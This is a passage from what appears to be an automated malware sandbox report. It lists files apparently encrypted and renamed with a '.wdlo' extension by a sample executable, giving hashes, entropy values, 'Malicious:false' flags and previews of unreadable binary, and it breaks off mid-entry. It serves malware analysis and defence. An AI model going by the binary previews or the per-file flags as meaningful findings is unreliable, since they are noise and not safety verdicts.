                  Preview:WSHEJ......-..Hg..!.....u...._.X...e.j"sz....M....l...7.....a.p<5.)........]..E..6h..zw....u.C...../.Mx"...F._..cO...G.tX......q.".n..1..=..va....M2.....62.`...9J.'.;l...7.o..Q....zC.^^.)L..J.{..gf..x.m'rlG..V0=.....I.......+?>...v....~..,W.z...@...*/ .T../.+m....Z.nf.N.[.Q..(..v...u#.......p.Z.....a..OHE....?..@..`x..#}#........yi9.I.g.#...O.`P........0....w....\...x3.^..lG1..,.OX.f?;8....{@...y.,....L.!.=G`..mz..7mG.....A.8..U..2..`.k.NR{.;.J...cNu......5.u/|..rUP..sb...A.@3..~...\..w..:.QyA.C......,a.W...nS.u..x,.uE.L.e..O[j...{%dq'.....{..LU.V..X...HO....~.......F!..T.lif...k..lxI.-Sh1.....M....6.-. (@..........B.H..s.z2M.K.@tlF.D^..9.Kx.....NNp...c1l7..s.NM.....i...*.A....=C.#/..G_....gc.r.!....w...`.!...HoQ...3...[....=c...z..F|.HD2.U..p.....D...,...w.. .G.$..Z.1...g..um.8.2...:...S......Y..a.......?....1_...0. ..........'..S.|&O6.a.[.|...@..P...0.....D..+...!..N.....J.........o..h>...we.h.....Xf6...M.g)q..W...[:..9.....T.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858835963246804
                  Encrypted:false
                  SSDEEP:24:fwYWNnMCw+nm79adQnKhgank4zKvbhDKe9IOY5y6pbVcpHDR07q7Gk03zbD:ZyMCzm79cuKSAaZtMO1R07q7Gk03nD
                  MD5:9E371AAD92236B5A3EBE840E9C8BFE3F
                  SHA1:89E7536476896821B69E8C2CD5E11C50F6F2D1A6
                  SHA-256:3CCFC8421DEC82D8C22409A9EC01BA9990B3A46701B1ED747FD46FA552C8980F
                  SHA-512:A8C8C598DC71501813BA89705740FDF9A12E3024E7ED5A578832EF3D1623FD9B1C5AF02CA93BDF7866CE9C24B5FAAB3AF3C49FFA675C2EC01F7860FD650C2F9B
                  Malicious:false
                  Preview:WSHEJ.".j.r...W...c9......<....?.}.....=.l.v....i....cX......j..M..V....J...gt6........'..v....r2..>y8..D.6.ML3..(.Z[J...s2.R.Z...h..jn.... .1.!r+................2.-U8.-].....,Oc!.}..f.3.%:{k./u...".k..h.hK..6..dPz.N.q....V.F ..N.4?O8.0`.5...S.$.2.Z...4.<+A.d...80......W.......~.|..J.>..I.a.t..xi.a.XO.....})...9}.....L......s.y|..is..v.A.n...Vh.<....4.;....)3....?.....+...\.........x.I..fp...'K]>)..........>.h......i.Am.J5i;..f..F.C...-...... /.s}XX.Rg..&........oc.wl{..2.\...u..>6.u&..2u....^...R.....1._.z>...v2.6..j....Q...#........{..l..U._.qB..Q5.......9..5..c..1i..~..Zkhe.!.M.m..W;.Y.2"`A..H.].WM........]....2.@m3...J../9].E...z\Q.wF}}6=.......\Ytt,.Z.....x...wp....In.Gp.H....}z.R.$5...ad#.Y..6h.?....0..u....Z.NE..f`.........vW...0...j....WZL..t...2q....6..!..np....&5U..EM. @...eo.7...bU..Z.f.......#... .)E,?.....*(..@.~....s$$.y.....x........>...^..}...e.oO...i..i.q......B..<.%..=[h........M..K..9.;...@@.j...].l....>A&.C./..$...g.,.i/..^

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YYTXSGEDYK.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.877186762889906
                  Encrypted:false
                  SSDEEP:24:GwlCHFdTWElNH1Cl/1fAL5+qbLUr4H/WdYfR7l/EfngDrEcrSC3zbD:GweFd3HE/nkLU8H/WifRBGqx3nD
                  MD5:20DAE14096F3D2047A8BE50B7C6CE636
                  SHA1:4F3DBAAF107B4C3A6B17A2AB12812BCB28D74399
                  SHA-256:7A91B0AD0464352371AC1CB59591E3E561AD476BB8655B2FF0C8C8C3B3B0EA93
                  SHA-512:87A508E94794FFC027CF37880F1FE531D3D79C2FDF9E16EAB4EBFB0B7ED70EEB07D9FD02DA82FF5B0FE12CEC0FFE60E3CAC8C8F7750FD19E0958EE8E46D7551B
                  Malicious:false
                  Preview:YYTXS...........2....%77..$2.......[7...tW...&.$g.[...9i...O..#.p.]...]^.UIE...F*....\^s..SBQ.."Y.u.1.;9n.......IOg....4B..cp.....6.\...}.b...r...`....;....^..%....Q.(...l....-..JGa....(.LL.M&Iv.#.Y....t.__/.g.o0........ygIH.RH.7R.*z...'.-...O.:..X.&..o.N0..%S.VR..l.w...N.!.K...........2..~..rK..|..@b.......Ndp.2~C.=.H.M._...'u....p..........*...kuFT...$..|.Ld0d..r.jEm..1..8[..iC8..P(Ww..m.."..y._....*5..y,.......]..wf.$.!@.......10.G._..Z.3e. ......v?.D.e]o.s_0&Ls\$!......#Y.D..G..........q).*+a.D!..\7....K?)J............!G.O........#....^.......|.[...bn...NAx...{..yP.;..Jy..5[.....}cj..q...g....'=%..&}.C.r..i.....g...o.e.pZ.^+.@_.%....N.,Zq...5...........;...g.....Vu.5...jay.~..{,..?..,.Te...S.a.i.Q..dW..i....3?....T.CCo={..O(...5&..H.p.&..:.)?*<..... .J...ETE..%....,..Fag.........F.S.B|..'..w......f5H.............L..O. .....8.1..}...\^.B~2...sj.r........[...~.<..(~..E.......... hU..V.F.m.v.e.}r:.....l.....<...z.z.i!..@bw....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YYTXSGEDYK.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.840715736693536
                  Encrypted:false
                  SSDEEP:24:U/BkZhdFOx+FlNhUaGwz132bXptORVyf716kZ0Dc8C+l+L1v1wZ/fv/F/VoK804Z:ykTdFOehUfwz1UO/yD16k05Avs3N/Vo3
                  MD5:1A8224F16E3BDF07E80634563B6D2137
                  SHA1:C22CF1D0EDB12EE61F294A44852154CACF590FD1
                  SHA-256:42736ABF5806CADF8605C0991718E9460346D2C56768ABAF830D9A6BB442DDAA
                  SHA-512:ABA8ACF3B3DB81A7DBDB883ABE3A7B115807CCD4000A6124B1C579A5CA423A729C2557B85FC0910A28D4EFA19071C51E38C59A20E6742B1092B6C2CFC19F2D2F
                  Malicious:false
                  Preview:YYTXS..../|>.9ok...Z..g.}..i.."L....Y...:.`..$cs..3...A..6K....E..?...,...s....*..c.q.3..."........vV9.A..5..-u7k.G...Bv....M....n.4...6f..m.J......((..4.[..M-...pOeBO...%.t.`I ....c.......M.l....K.23m`F........<?r.=...h...3.R.g.....k..K....0.....gE..m.$%{.5..X..1.\7[.8!.G.S..v..@..6..s...S......L...u......Ep'z.3@.*. .[v.I#.5....l..._N......k.A....[..{.T.H...s..-i..k....o.q._........c..T..7..ce.C.|$)w.......c.......Q..|).3...@.`l..r.v....c..... n8...{..w..XU..J5.0.._.L...+....V<y..#..8....*.c...@.q.$s....w.#....$V.v.}*.....VS?...{R.n&K..a.(.$..U.....i...\.{p.*.E.8..qh&.4.........g...4)...H.]..=.....Q.j._.&..._.H6...\.T...A.5..........;.,.EJ.5...r..N(......D.k.....T<....%o_`&.M.e.....(B;.Y..DK.G........4.m..W..F..3+....-{`Q.*.sVi..'..D...&..>8E..M.n0...=n...t..x.u..^O..4Z....W.c.V...crm....C.'...1..V.C...^gZ.W*3...Q.q.yv!.G.\{.f.a|e.$...2.....]X.MvPl......;.K......%GB.(F....=...f.&lF..R..z7.."e...#..:.K.x..o...2.....r.X.x....+......1'...v\...C.o.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZYXFLCGPAD.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852460523692268
                  Encrypted:false
                  SSDEEP:24:rZUQrBOjtgk2a68r3mjpw+I2bO81AFuoyxkhkG/OrY/FSYScXeBK0Zp2K3Dadc3D:r253mjBFOvuoyprYsYScI/ptN3nD
                  MD5:2687DEB0128150B3840C53BDF8BBB0CF
                  SHA1:010ABED6C15F305D646A627E08A65190AE19575F
                  SHA-256:8CF0B64E35A026725D1EF9E2C2CFBA2516FF88AAAAF4222DE24D30BD519FFD16
                  SHA-512:E23797EDFE02CA55F726B6EDB4014BC001B705001633743FF7B02DBDB7E77C26FA2A20DE2FA34B4A335B3B477205E8781717E14DE51D192D7B4ABFA2FF4DD93B
                  Malicious:false
                  Preview:ZYXFL.w(.K.Y....^|nG...9J....L^......1.......Es........l...Y..:Pc........R..".U0R]q...k.;........%...}..].r..9..um..v^.........8E.......k...~..<*l..P)g.......=O0....L...R....z<]...`,.m5..P.......}!..S.na..X.5.P..>y...y<.q....9.#.G3.6$........T .xX0...s:...e.&..g.f.q..p.qe........"*@..J.;:f...f.......e....;.......e... ....tnP..../..}.`..#=4......Ze....9..o.<+..n`.8..3G.7...\d. hE.z-.;.`.._h.%...Y.j..6....,".s...#YT..%Q....o.(6...s.2..O...hA...@..SIrm...z@....x.V.<]..O18+..op!...7..w"...`..D.L..V<..D...*......i..i}.Y.....X.....Q.}L|..+..........!..|.l.Nuw.S..BO....w..O\2b...5.1.d.O.6.%...+z.by.k...V...T..).J......j.Q....J.x.n...$.^..&....[.&..>K......0...k.U...2......7~...9p...7.-.Qi,.3$......T.....T.v.UMF}Y.GHl......\....K9.=..q.........2d.R..g..xf....0.d..'...TIU.#..j0W;.5.5...._q..[|s^]..MOW.....p.......w..X]:.qoc.....kg....B.4~}....3........4......_,.:...Q}.\.....B.7.RQP..CE*.....bF4^.}A....../".6............-:..O..nk.....@{.'.m[<D..../..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1383
                  Entropy (8bit):7.887919196748003
                  Encrypted:false
                  SSDEEP:24:Qwxebx0qq88a8R5WcPXOtzWc9DUDSVseN1m/FdM5144oo0oTXH43zbD:ODq286uMzWc9DKe3iFR53nD
                  MD5:DB6E3827921AB26FD8AAACE720F000AB
                  SHA1:E33A3949916599B15FA8CB4C3B5E313B157493E5
                  SHA-256:DF08C2643E98BE038C075C9CB1D95DC59A1DF99C45AEA5A8E53ED9D4038914B6
                  SHA-512:92CFFFCBA3BFD24ECD1C27F987F27C760E4907EB0D40DCA7D969AD2731F52EBF532FCDA16C55D32324701E3B6E2FE070877876C52C40CCA963B56EDF2E78336D
                  Malicious:false
                  Preview:L.....X..W.q5..O...F.e...=....s..Y....|.Nl..Nd\.....'.....}..'.~Km..1&tl.....E....}.X.....$....X3...O0..E.z&&.t&ZC.]....r......6.NE..$.)0\x~..z.[S0.o.......K........H .c...?n..nC.....<4,.u.$j.[ueK.8$%.D.v.....p.B..1d.....I..2.J...7.P..i...TGF.pVqO...o.t....|.......3...l:.R..T\..p....>B.5.U.o...#.Xa?..z.5l....6.2...$.....g...h.N...I........s.....@A}%.....m..!....y.........+..xR.~..*f..m=r..3_.7....8....:...4J..2.!89[.qrS.u........./<zc.w...b..~.b.....#.^.L........`..]..m.|!y...q7\-D.TG..e.l$.`.#Fo.Z....%..+x.B..[>*."...$M@5...f.......!.....2.........kJ....S.s..q(...%.5..:......).\@.2.<.^.....s..|.;.Z{C..b<.(R/...[T.|i....X.4.vz1":U.....gX.xA..y%zf.....D..ttL.V.?..;.Su..t...........X...Jvo..}I..5(&..X'..n..+..........)...I.yg,....<bt*.@>..c...Q.......zy....^,...}{..N.s$-3.8....<?9.Lg......;....`{...._...+m....... W...3=.....NQL......4.rn..#.....c..h...0-S..]..YU'.....Q5..A.9..w.......p...=(.....34%! u.&9..d..y..b...;..o.u!

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):7.344473402635217
                  Encrypted:false
                  SSDEEP:6:g2/vyIdOcMIXdrrM2QgVPnhuh8vbpSzMyoSQoWERobOsVolWbz6Wcii96Z:gAvmSFrM2QgVP4qvbpSzHi3+o936WciD
                  MD5:377740566CEA2BF4780DD6EAB4175192
                  SHA1:C09E45A9C528D0189DD56FEF12226BA49158636A
                  SHA-256:277DFEB2C1EB3D588A4D13C7E5F6507B6C0561B8679B5E8368D53D9F48A4618D
                  SHA-512:874317AD453E5F3252D76D14D9D3961C8C32779300173BA167A3B6713570E4F612F347B6F2A7397A6E1CC2EC85B40B909B2C4E661281C6B6CD225C16F5B7D926
                  Malicious:false
                  Preview:deskt:......MW.Uh.!._..S..u.m...Q.O..c.K<.h...........e.D.........]5...p.y.........r...l.Z]....+.{.Gi.H...OOMK.!.H%Z$.....R..P.1hR.s...)D/.3.].W0......^.Yo.n.].........N..7..9X.....I.w-..z..zb..G\...t._tv..".;O..8.......-G...+h=Ny.O).........i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Application Data\.curlrc.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):7.1845918631357675
                  Encrypted:false
                  SSDEEP:6:KWOrIJqLTkTAaxCDyh9tjYfzdFfZXg/0Oerkmf0THFGmnBOsVolWbz6Wcii96Z:NOc8LK/zhryZXE0kmMx/36Wcii9a
                  MD5:5C58CF4C65AA195D98280166C03FAEE1
                  SHA1:C1B3B3BEF1A0109146FCF0CCFCC6D85EE6B7DB44
                  SHA-256:731859582A7F99F949CE57D7203E503DECB292E6AE4F7B848B2A40FFE13A9B00
                  SHA-512:AD7A5D1FA54D6735992A4C3A073EC93849528AAC11B918855AA395F6BF724A528524B6B0D15CE0038F1EA4CBB13FC5A10A2395DA6D918E3F79A6A93CDC58A81B
                  Malicious:false
                  Preview:insec.A..&.}v.'-O.s.L.-..Z.=.Y.....m.4#...T.Ud.>..Q2.'WN..G.X$..Z.q...9F.X...O.t..$......f].........;.6.2.?X.o]....IV*...j.Dy.q.~.....wK..[6...Nq7.&.l..FK4Kg.Vb.0m.s.b<5_i..B....m+.L....s.-......B..11.Ek.n....E4..K.@-,>!...=K.\L..[v.w.n.....8..>...W..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):370
                  Entropy (8bit):7.352136919050028
                  Encrypted:false
                  SSDEEP:6:FUGLk3u4FHKqz1mphKGTZkKMiwPz50dj4VJzNuaTvucoVkXV6kbDO4OsVolWbz6Q:ec4qqz0r7tMi60djCJhjucoql6I336WX
                  MD5:97D9D15C3B6689B2D0D6B28817904E6C
                  SHA1:00219CADE92CA8E46567F71FAF32AB3E5F637218
                  SHA-256:CF03175F80080E95915E31CECFD29F8AF67223C401A998855AA3D7C08AD62487
                  SHA-512:F7EB0710CAF5A282FA5CB89EABE0120F46F7AE0F4BFB4E5A611BE3AA9D68052A99C1ED46412B828060DD427D9B28957099B4110BC79DF46FB21388B7F3DA0C39
                  Malicious:false
                  Preview:%PDFT.Xtc.V.HH4X....6 2.K....xP.77......8..A...p..X...ze}.J.i....elY(.oP..GB.....%&.W..H.&...a^...$...ky.,.Ce.g.93...5~).}.4L....*.....=.v.....gt(.+.a^..2...ve..Z.R.|..2....q`;.\...3.9..5e,.P{.....-Z-GT..[..b]....]n...f.v3.Q:.2.......J.~He:E....V.[.\r.Ip.......^...pY.....q..ki0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):388
                  Entropy (8bit):7.373305207071778
                  Encrypted:false
                  SSDEEP:12:xEQyKeOr6VxQNbn+ZjKiltidGonJdKt6BZFgNYz36Wcii9a:xE2RrW+ajKAAdGomt9N63zbD
                  MD5:39CECCFF6180FBF7442B645253337AFF
                  SHA1:30D2A692AABA49A357998117B8341682453CE9C9
                  SHA-256:9EC05EDD112CF2114FAB996F4E650FBF0B2784A65AA988C6BAB81C6BA01CAB0E
                  SHA-512:372EC0988B119148C258EFAAD63C4A9223299F02DB6E5FB00EACE45298DB0B2E7B5207669181299B11E69075BA00A8BE376B7B66E5EE086428FDBC0E3664171F
                  Malicious:false
                  Preview:%PDFT._..L.w",._.M;.......y....r.ON(|..j..x...'F...[..6.o|..K...+.x.`.noM.....AV_....H.........BP..F..5j.]h.o..t.HBB.4P. .H..Y..:dB...C....l..DJ)..W.....m.....2...k.^j...^f.s..2...x.1t.pH.......Z.....?|..M..-R.., ...s.l?;..8.Q...E....>.40....g..H-...@B./.Q.!N....F.i..H..U......!....A.1.&....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1352
                  Entropy (8bit):7.855325046178151
                  Encrypted:false
                  SSDEEP:24:NediHnd6sBi7cvCx9qNaM6tn5Ane5Ki25nXNnyoetKv3zbD:ZHUAvCxkNaPAe5525nXNnH3nD
                  MD5:9CF81BEB3ED93AF896E1FC3B02FF0E67
                  SHA1:7957E152A89110C36E70F8A62D0354A266A84D90
                  SHA-256:CB1DDD67A00E816CA12B5C0D9ADC36415698AEC2A8EA5862163A7865135BEB0D
                  SHA-512:7EE0F9CC60FE46AFFBE7311DCB55B0B63E0D6EF50A247F93D816FA677262407C4F83F974220A27D3ABCE6459413CF11E63E6A5209229A596DBCA3E6CA23DAF8A
                  Malicious:false
                  Preview:<?xml.2t....pM. u..L....`.G..6.j.#s.W..5.......P._..$..S?.zs^..B.f..B."..rJ0..4.#.).3WH&.!6..z..v.k'.3.4.6.|W...M..N...+..?.\..7HC.W...I....t.>...U..an.....r]t;...._r.b....*.A.!...QDS'...%.FFy<-3.g.v..i..\..N..!B/.......Y"....4....)3......h.T.........../5....N.).|..f....zBm.m.<.`j.@..DB.s*$e.V.*.;...a..V[.....k..=F9.R.b7...k..V.N....A.F_7U&.......N:.Hgc-f{..=Q.!.D#..N_...].o.[.w.|>.=.T/..~E9........0O.s@.........%..Ycs[.".....k.....X.}8n.?.(..>...cL...{....3F.&....N1,...\!.,E...VV@..b..;.i.1...pM...z....=.,.$.8.q*.62.........^!...>.SF.z.=.~ t5`...'o>.-.:..1..+..X...s.w]w/.O.]....H.p......&j.........d[.3.3~.@B.-hgf$*...Y?I#....E.9.&F'G...4O...'&.........3..........(..#t....UBN..W...k.2.{'H..Xc..W...x...."%.[z$7.4...|.\y+8....ow.....,.f......7.Ga..i'..7K.r<.KQ.j.f.L.^...jX`.. .'.X.f./.@8.4.}-j...K.g..I.......=$.P...Sl....q.Q.r%R.Z..l5O..4..="C?b-...C....?=.._..q.._6c.Ue....*O..M..K..n....2.vX...^:/<F.....<l....M.A..Od. . .....o..p..>......).

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2445
                  Entropy (8bit):7.923425762027683
                  Encrypted:false
                  SSDEEP:48:k9NNVqaJaq+OO7o+yJcshKDC39/wV3LwuluzEmytXO1bjR5JfE3nD:kTN0aJD+8JcCVwV3vlubyNQ5JfW
                  MD5:748646A7C32B239243DDFF984DA5E8A4
                  SHA1:640F815DCFC9A0510F9683A768ADB41E6BC02097
                  SHA-256:9A4E55E1999C4D17385B543094890A4DBE74B66969F73E4C58D67E356A912A55
                  SHA-512:5A99145DBF1C85415BF1D5F3742F2BDA7CB6A721661961652D1DB3B51EB54EE05412E85FFAD98AA887C5F8C902FC1DA01BF527F454C36640E6AF4271643E8310
                  Malicious:false
                  Preview:<?xml....[...,M...c..?...v.^........+Y.....@C7........3.q...R]..1.O.iXC\...8...L.*J..:E..+.0...j....?l|`.ZD.{..p..W.....<.~.;|.e..8D..J.x*.......#MR6|.G...'..#D.....h.aTP.}.....K..|....x.P.....aY..:G.C....U..#..t.bp.i2c...n...q<....B....._.dD,.c.DZ.......X...)..F|.....b'.?eq.....g......nK.U.a!u.N.......K.y..8S4W........~..D.x..6.....Ayk:x..L|..*..G=J.......l.7.g!.".q........:.e....9+.M......18l..!3w...G....C..Z..%U.*..4....z..U)<...@'0......m&J...1.:..T...k.r.{..&w...A..>:...Z.....g..c..S....8.4@...^..g=.e.,....yE!Q..n.S.3.1..T...A...$n..Pf9..Z.....9....B`.;.....!.%..Z..z..u;...u...#A.@...{?'..i.p.......Y ..S..I..6. )mS"..Q.=.M..g..I3..v.xm...G)'....@.....c...............q.s....r.D.........SX.zt....<..U.e.vD....CuXW.N...d!.,.{.N...g*..P..%...a...p...h....}...UT..J.8...'.....O.zGb.,G'........ca}..)..J.&............x.............,I...W.. t..A.. ..f.|.V..D.a...t..,..?;.....>...!1....Z.wf..w`.....0.....;.h~n.\.[..@...,`.%.k..j.7|.

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2402
                  Entropy (8bit):7.921965336293885
                  Encrypted:false
                  SSDEEP:48:SXyYv1HKuKYTyiZ30RKMeUdiZKsH6l3TCZDgRsXvdyq7gZf7GA33nD:SCYdqqTyI30RKMeUdiZKsH69+dgCvrgp
                  MD5:B5515EFF5534FA77EDAFFDC96239EB00
                  SHA1:71082D50A630BAFFCA3A3EDF3218A872085506CD
                  SHA-256:D14946373C32F94FA50D56A89666C48EEBF4B2A4B55DF09DDB677E5D4199378A
                  SHA-512:5EC885939E4BDE61DCF87AA959875889E34994831983BEEA4660707DE72EEA6809F4C3D0090BF0676059E22BDBD5F8F74B5CE211EC0C0FF63743D65416C11CF7
                  Malicious:false
                  Preview:<?xml.'.x..<.u*........%.,Uu..e....F....G..~.<qPw..J`..U...?._.&7.0.\..!&......1|kT.WzKW.....@.b.K.x....#2gv=}.....b~...29.#.J.4.R?.c.........n.]...*......EA.4x.w..".........$.c#.mZ..d.(y.../...'*.q.^.....D.......j.V@.A.~m(..xt.2.-..;......|..n.3?..y.mp7.lo.>....*..:2..|@Q(......=Y../.p...uS..{".....U............#..Kq+.c..7.azG.......TznAUC.<Nb..i...z`Fd.@.7...|.'EOeF1. .V.g.....<..W.e..9I..H..O.vr....+..e...5...J.._....9._z.d...$w......./.R.@...=../...2|d..'E0.4.........`Xyl..;.. .......b>.}....".<2E..U..t,......2..4....X|{.L..._-&..Ah......*.....gV..*..n.k..c.[#..'.D.G1{B*,..Y.h.A...e..9..v......1C].(.D.3OK......+s.~..v.!..>RZ...DM56p.[%....J.2.....4a..s..q.&...Wj.$q$.yv:.....eZ.......Y4.F.0g.3vy8 ....N..^.Zk......n..].$Z>Q...N...r.w. ..R.nn...[...*.F1..F.;T.8m.n.TV..R.......).$I6..t."..K_Ik..={$)...q.1..t..X..N..:.Q.....M-iM.B.h.z........7.2{.ax.[D..gE..^.@@......k.....7^C0T.&U.V3wcme.'.......F.f...:G.....=f.[....+N....{.).....1........B.m.

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2420
                  Entropy (8bit):7.9175996123618795
                  Encrypted:false
                  SSDEEP:48:XyZlwgcMmrb7GNC0XNVck8+5dNSgO7lmLEM1rBberD8nPGCJyu1ynD3nD:CZegcMUp0XN6/+vwgO7l+EyoD8nPGKyH
                  MD5:451F0892637A3440F76A953D95B3F417
                  SHA1:770A3E2C7F62CC52029B423481309721152BA739
                  SHA-256:6777D645310E6C9A35F4A8D237BF86E68CBE3581A44BA7D5C79F808DEE81827E
                  SHA-512:68B258C83D0698D0416F80AAECB07217D1C1F760ABF02082F291BE4EF9B61EF88040A83A00DBF4975D08D62B6972D10C88C6BE113430023B1247F1D514A1F97C
                  Malicious:false
                  Preview:<?xml.(.py../..5...@].......h..?.S.J....(..qeq.......}...eJ+uo.....Gqo.D...["P...h...V.8.i.U1`o9fJo.5.|{.m..{cP..h..l..l:.[.q.....j...6.."........k|XP..=........}.I./.0....b'.D F...F~>.n...z...=...A.P;=...EY9tX.U...4........3.~J...r........C3.T.......D..H..o.Y0..b..N..m..J....G......._I..:.....g{.>).L0..F.....P.X.....n.UP..m..J.n..FL..G..=...Y.!12....3.{...=~8..=..z....M....~F.|R...qi^.c.c.z...w`..g.....-kIu6....U..Y..x......E~..`<w>..II...._...~..'....l..VL...H...?...%.Y.0._..F....w,.8.|7......<..T....._..S..9.rB..].gh.\....z...0n.uK.}..DT.P.lUif@.e......n..,i .......p...b..g2..ZE.#.-k...Q...a.h....S1....Y]..MOw..~.&.l.Vxg.......E.F....-.g...>.Z9..=E.O....KDHx7qD....U...v..k6.G....%q{......o...6N%Y0....a..f.\."....ZE9d.S@4...X..^nP.w.6.\...>yI#C.8<mv1......].7!+.f.B.G|.c..OK_.....*.;..O=.b..|.........D...t. ....Y}.}m;C_..0{NOl...j7...eA.Oq..!.N..,.y.k..6. ._..-.X..e.....Qf...L....P\..I6....E'...^U."..Q.9..>K.-.;...;}|..d.|..i..;_......5.c.vx

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1358
                  Entropy (8bit):7.814046897963588
                  Encrypted:false
                  SSDEEP:24:0DOhFbk6GfZnuEVTA17JmYMTkfi+cAbk6WnLp9oDXH7+NPqqI0K83GOJwNaSJHrE:Wz66Znu6k9Jm6iLAo6Wn19oKpzIP831P
                  MD5:9B296A5AFB602FAF973793E1B90005FD
                  SHA1:E912E004227F439B749549F6446B0A2ACBFCADB1
                  SHA-256:ED3F5CA5580837CEE4D992C8826AAB1F0023B337C892E989E89F075BEA181F89
                  SHA-512:2F6CE3546DB044AC8ED19F8ECCAFA4C1F5CD50959BE33E80C2581DD5189E5135E66241C7D621A0340CD240C9785719C47DC98E30E28667A7058004E1B435A58F
                  Malicious:false
                  Preview:<?xmlN...k:3..k.@..ld..OA+.......{V...l^k.vb.JC.xi.E...A..l..-Y.D.Q;..KS+...!.....m..!....D.94.U...r..CZ.K...B.B..!..z.Q...........5....J..4....a...E(.F/P9o.b....T...i.1P..y.L.........>$.....-.r\p.I...:...V...S.z....Wt'P..`..y...M.G.)....f~..j.eF#...J./:.l..B......]...l........R.{&w..=H...M..X'&.3...4.s.`4.../.....I".)L..=.B[...>..P.j.VH..!Dz4/]a./..5..[4..@)..B....D.H..K${-PE...?).....PIf...Xm.I.aPs.T.E....K.......x....}...Wy.7U&.P..9.......<..M2jNg.....Nc.%.......&.AJ.E.'..AuV.6)...V.".....-#..s.3..2a..w......Ra.6*.Ad.....y~......'qdl.<jXa.mSW1.M.....:..Z..J*.....>..4..<..e<..)...j.=....-.p.h.....,;..t'..B.......=5A.....SW..g......[A.*2.Y..n.....P.uL..L,R.O..q.)$e.{...h.j.1.......eF.P.u../.n.....A...ar...4S.W...6ty5.PP.k']!.Y...9....a.zWX.L.l.P..z..v4.z.8]+..o....a{)h.$....r......s.$....4..Tl..t"..x.._.&8.[.:...M).rN.`3..{.|w..T.5.ip.@U..r.m.L7.)....."QP.D.:1...L.Bl:f...~@d.sM-5..=...uY.o.mv/y0...pk.....<H...6...T......Q.4p.,C

                  C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
